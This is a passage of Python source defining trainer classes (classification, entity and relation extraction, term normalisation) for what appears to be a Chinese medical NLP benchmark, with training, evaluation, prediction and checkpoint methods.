self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class CTCTrainer(Trainer):
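    # Sequence classification trainer that consumes pre-tensorized batches
    # (input_ids, token_type_ids, attention_mask, labels [, zen n-gram features])
    # instead of raw text; evaluated with precision/recall/F1 via ctc_metric.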
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CTCTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
        # Dispatch on model type: 'zen' models take extra n-gram inputs, everything else
        # follows the standard 'transformers' interface.
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
labels=labels, ngram_ids=input_ngram_ids, ngram_positions=ngram_position_matrix,
ngram_attention_mask=ngram_attention_mask, ngram_token_type_ids=ngram_token_type_ids)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
labels=labels, ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = ctc_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[3].to(self.args.device)
ngram_attention_mask = item[4].to(self.args.device)
ngram_token_type_ids = item[5].to(self.args.device)
ngram_position_matrix = item[6].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
if args.model_type == 'zen':
logits = outputs.detach()
else:
logits = outputs[0].detach()
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
ctc_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class ERTrainer(Trainer):
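    # Entity (subject/object) span extraction trainer: the model returns four sets of
    # per-token logits (subject start/end, object start/end) and each head is trained
    # with BCE loss restricted to non-padding positions.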
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(ERTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
self.loss_fn = nn.BCELoss()
def training_step(self, model, item):
model.train()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, \
obj_end_label, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, obj_end_label = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
sub_start_label = sub_start_label.to(self.args.device)
sub_end_label = sub_end_label.to(self.args.device)
obj_start_label = obj_start_label.to(self.args.device)
obj_end_label = obj_end_label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
if self.args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids, token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
active_index = attention_mask.view(-1) == 1
sub_start_loss = self.cal_loss(sub_start_logits, sub_start_label, active_index)
sub_end_loss = self.cal_loss(sub_end_logits, sub_end_label, active_index)
obj_start_loss = self.cal_loss(obj_start_logits, obj_start_label, active_index)
obj_end_loss = self.cal_loss(obj_end_logits, obj_end_label, active_index)
loss = sub_start_loss + sub_end_loss + obj_start_loss + obj_end_loss
loss.backward()
return loss.detach()
def cal_loss(self, logits, labels, active_index):
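        # Mask out padding via the attention mask, then drop the first and last remaining
        # positions (presumably [CLS]/[SEP]) before computing the BCE loss.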
active_labels = labels.view(-1)[active_index]
active_logits = logits.view(-1)[active_index]
return self.loss_fn(active_logits.float()[1:-1], active_labels.float()[1:-1])
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
sub_start_preds = []
sub_end_preds = []
obj_start_preds = []
obj_end_preds = []
sub_start_trues = []
sub_end_trues = []
obj_start_trues = []
obj_end_trues = []
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, \
obj_end_label, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, obj_end_label = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
sub_start_label = sub_start_label.to(self.args.device)
sub_end_label = sub_end_label.to(self.args.device)
obj_start_label = obj_start_label.to(self.args.device)
obj_end_label = obj_end_label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
with torch.no_grad():
if args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
active_index = attention_mask.view(-1) == 1
sub_start_preds.extend((sub_start_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
sub_end_preds.extend((sub_end_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
obj_start_preds.extend((obj_start_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
            obj_end_preds.extend((obj_end_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
sub_start_trues.extend(sub_start_label.detach().cpu().view(-1)[active_index].tolist())
sub_end_trues.extend(sub_end_label.detach().cpu().view(-1)[active_index].tolist())
obj_start_trues.extend(obj_start_label.detach().cpu().view(-1)[active_index].tolist())
obj_end_trues.extend(obj_end_label.detach().cpu().view(-1)[active_index].tolist())
s_start_p, s_start_r, s_start_f1, _ = er_metric(sub_start_preds, sub_start_trues)
s_end_p, s_end_r, s_end_f1, _ = er_metric(sub_end_preds, sub_end_trues)
o_start_p, o_start_r, o_start_f1, _ = er_metric(obj_start_preds, obj_start_trues)
o_end_p, o_end_r, o_end_f1, _ = er_metric(obj_end_preds, obj_end_trues)
f1 = (s_start_f1 + s_end_f1 + o_end_f1 + o_start_f1) / 4
logger.info("%s-%s f1 score: %s", args.task_name, args.model_name, f1)
return f1
def predict(self, test_dataset, model):
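        # Decodes spans one example at a time (batch_size=1): TokenRematch aligns wordpiece
        # tokens back to character offsets in the raw text, and data_processor.extract_arg
        # converts the start/end logits into subject/object argument strings.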
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset, batch_size=1)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
with open(os.path.join(args.output_dir, 'CMeIE_test.json'), 'w', encoding='utf-8') as f:
for step, item in enumerate(test_dataloader):
model.eval()
if args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
with torch.no_grad():
if args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids, token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
text = test_dataset.texts[step]
text_start_id, text_end_id = 1, attention_mask.sum().int().item() # end+1
text_mapping = TokenRematch().rematch(text, self.tokenizer.tokenize(text))
sub_arg_list = self.data_processor.extract_arg(sub_start_logits.view(-1), sub_end_logits.view(-1), text_start_id, text_end_id,
text, text_mapping)
obj_arg_list = self.data_processor.extract_arg(obj_start_logits.view(-1), obj_end_logits.view(-1), text_start_id, text_end_id,
text, text_mapping)
result = {'text': text, 'sub_list': sub_arg_list, 'obj_list': obj_arg_list}
json_data = json.dumps(result, ensure_ascii=False)
f.write(json_data + '\n')
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class RETrainer(Trainer):
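    # Relation classification trainer: given a sentence with a marked (subject, object)
    # pair, the model predicts the predicate label; the 'flag' tensor appears to carry the
    # entity marker positions alongside the usual BERT-style inputs.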
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(RETrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, label, input_ngram_ids, \
ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag, label = item
input_ids, token_type_ids, attention_mask, flag, label = input_ids.to(self.args.device), \
token_type_ids.to(self.args.device), \
attention_mask.to(self.args.device), \
flag.to(self.args.device), label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label,
input_ngram_ids=input_ngram_ids, ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix, ngram_token_type_ids=ngram_token_type_ids)
else:
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label)
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, label, input_ngram_ids, \
ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag, label = item
input_ids, token_type_ids, attention_mask, flag, label = input_ids.to(self.args.device), \
token_type_ids.to(self.args.device), \
attention_mask.to(self.args.device), \
flag.to(self.args.device), label.to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label,
input_ngram_ids=input_ngram_ids, ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label)
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = label.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, label.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = re_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_samples, model, re_dataset_class):
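        # Prediction pipeline: data_processor.build_text enumerates candidate
        # (subject, object) pairs for each input text, each pair is classified one at a
        # time, pairs with a non-zero predicate id are kept, 'Combined' is set when the
        # subject and object never co-occur in a single sentence, and duplicates are
        # dropped before writing CMeIE_test.json.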
args = self.args
logger = self.logger
model.to(args.device)
logger.info("***** Running prediction *****")
with open(os.path.join(args.result_output_dir, 'CMeIE_test.json'), 'w',
encoding="utf-8") as f:
for data in test_samples:
results, outputs = self.data_processor.build_text(data)
spo_list = [re['spo_list'] for re in results]
temp_re_dataset = re_dataset_class(outputs, data_processor=self.data_processor,
tokenizer=self.tokenizer, max_length=args.max_length, mode="test",
model_type=args.model_type, ngram_dict=self.ngram_dict)
logits = []
with torch.no_grad():
for item in temp_re_dataset:
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag = item
input_ids, token_type_ids, attention_mask, flag = input_ids.to(args.device), \
token_type_ids.to(args.device), \
attention_mask.to(args.device), \
flag.to(args.device)
if args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_max_length = self.ngram_dict.max_ngram_in_seq
logit = model(input_ids=input_ids.view(1, -1), token_type_ids=token_type_ids.view(1, -1),
attention_mask=attention_mask.view(1, -1), flag=flag.view(1, -1),
input_ngram_ids=input_ngram_ids.view(1, -1), ngram_token_type_ids=ngram_token_type_ids.view(1, -1),
ngram_attention_mask=ngram_attention_mask.view(1, -1),
ngram_position_matrix=ngram_position_matrix.view(1, ngram_max_length, ngram_max_length))
else:
logit = model(input_ids=input_ids.view(1, -1), token_type_ids=token_type_ids.view(1, -1),
attention_mask=attention_mask.view(1, -1),
flag=flag.view(1, -1)) # batch, labels
logit = logit.argmax(dim=-1).squeeze(-1) # batch,
logits.append(logit.detach().cpu().item())
for i in range(len(temp_re_dataset)):
if logits[i] > 0:
spo_list[i]['predicate'] = self.data_processor.id2predicate[logits[i]]
new_spo_list = []
for spo in spo_list:
if 'predicate' in spo.keys():
combined = True
for text in data['text'].split("。"):
if spo['object'] in text and spo['subject'] in text:
combined = False
break
tmp = {}
tmp['Combined'] = combined
tmp['predicate'] = spo['predicate'].split('|')[0]
tmp['subject'] = spo['subject']
tmp['subject_type'] = self.data_processor.pre_sub_obj[spo['predicate']][0]
tmp['object'] = {'@value': spo['object']}
tmp['object_type'] = {'@value': self.data_processor.pre_sub_obj[spo['predicate']][1]}
new_spo_list.append(tmp)
                new_spo_list2 = []  # deduplicate extracted triples
for s in new_spo_list:
if s not in new_spo_list2:
new_spo_list2.append(s)
                # Keep only entries that actually carry an 'object' field; filtering avoids
                # deleting from the list while iterating over its original indices.
                new_spo_list2 = [s for s in new_spo_list2 if 'object' in s]
tmp_result = dict()
tmp_result['text'] = data['text']
tmp_result['spo_list'] = new_spo_list2
json_data = json.dumps(tmp_result, ensure_ascii=False)
f.write(json_data + '\n')
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class CDNForCLSTrainer(Trainer):
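    # CDN candidate-ranking trainer: each (mention, recalled candidate) pair is scored as a
    # binary classification problem; at predict time the positive-class probability is kept
    # and reshaped to (num_mentions, recall_k) for downstream selection.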
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
recall_orig_eval_samples=None,
recall_orig_eval_samples_scores=None,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CDNForCLSTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
self.recall_orig_eval_samples = recall_orig_eval_samples
self.recall_orig_eval_samples_scores = recall_orig_eval_samples_scores
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(eval_dataloader), desc='Evaluation')
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
label = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
logits = outputs
if preds is None:
preds = logits.detach().cpu().numpy()
labels = label.cpu().numpy()
else:
                preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
labels = np.append(labels, label.detach().cpu().numpy(), axis=0)
pbar(step, info="")
preds = np.argmax(preds, axis=1)
p, r, f1, _ = cdn_cls_metric(preds, labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
        pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
logits = outputs
if preds is None:
preds = logits.detach().softmax(-1)[:, 1].cpu().numpy()
else:
preds = np.append(preds, logits.detach().softmax(-1)[:, 1].cpu().numpy(), axis=0)
pbar(step, info="")
preds = preds.reshape(len(preds) // args.recall_k, args.recall_k)
        np.save(os.path.join(args.result_output_dir, 'cdn_test_preds.npy'), preds)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class CDNForNUMTrainer(Trainer):
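    # CDN "number" trainer: predicts how many normalized terms a mention should map to;
    # its output is combined with the candidate-ranking scores in cdn_commit_prediction.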
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CDNForNUMTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
labels = item[1].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
labels = item[1].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = cdn_num_metric(preds, eval_labels)
logger.info("%s-%s f1: %s", args.task_name, args.model_name, f1)
return f1
def predict(self, model, test_dataset, orig_texts, cls_preds, recall_labels, recall_scores):
args = self.args
